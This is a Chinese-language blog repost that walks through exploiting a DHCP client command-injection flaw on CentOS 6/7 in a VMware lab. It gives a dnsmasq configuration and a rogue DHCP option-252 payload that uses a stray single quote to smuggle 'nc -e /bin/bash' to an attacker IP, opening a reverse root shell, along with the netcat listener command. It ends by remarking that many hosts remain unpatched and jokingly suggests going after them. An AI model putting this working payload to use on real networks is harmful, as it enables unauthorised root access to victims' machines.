原文地址:https://www.o2oxy.cn/975.html
前言: 看到crazy 老哥說有一個好新的漏洞。可以在redhat 和centos 執行任意代碼 、 我說這就很有意思了。晚上來看看
他分享了一下他寫的博客。看了下。進入tools 看了下這個文章,仔細的看了下, 很有意思。有意思
漏洞概述
通過偽造DHCP服務器發送響應包,攻擊紅帽系統,獲取root權限並執行任意命令。
影響:
測試了一下 centos6 和centos7 都受到這個影響
利用的整個過程:
宿主機環境:Windows 10 企業版
虛擬機環境:VMware Workstation
攻擊者:Kali linux
受害者:centos7
- 1. 兩台虛擬機的網絡適配器都需要設置為 僅主機模式
- 2. 停用主機模式的DHCP服務
首先將兩個虛擬機設置成僅主機模式,關閉dhcp功能。
kali設置成靜態地址,要和下文中的conf中的地址相同,網關也是本機ip。這里我設置成192.168.71.5
root@kali:~# route add default gw 192.168.71.5
kali創建個dnsmasp.conf內容如下:
bind-interfaces interface=eth0 except-interface=lo dhcp-range=192.168.75.10,192.168.75.20,12h dhcp-option=3,192.168.71.5 dhcp-option=6,192.168.71.5 log-queries log-facility=/var/log/dnsmasq.log
開啟dnsmasp:
dnsmasq -dC dnsmasq.conf --dhcp-option="252,malayke'&nc -e /bin/bash 192.168.71.5 6666 #"
nc偵聽6666端口
nc -l -p 6666 -v
kali 這邊已經完成了
現在centos重啟一下網卡!
已經顯示獲取到了IP 了 看看kali 這邊的情況吧
寫了一個文件。在centos 里面查看一下
總結:
漏洞原理應該是使用了單引號導致了參數被執行。
**--dhcp-option="252,malayke'&nc -e /bin/bash 192.168.182.130 6666 #"**
現在應該還有很多主機是沒有補丁的。。可以去 …. hhhhhhh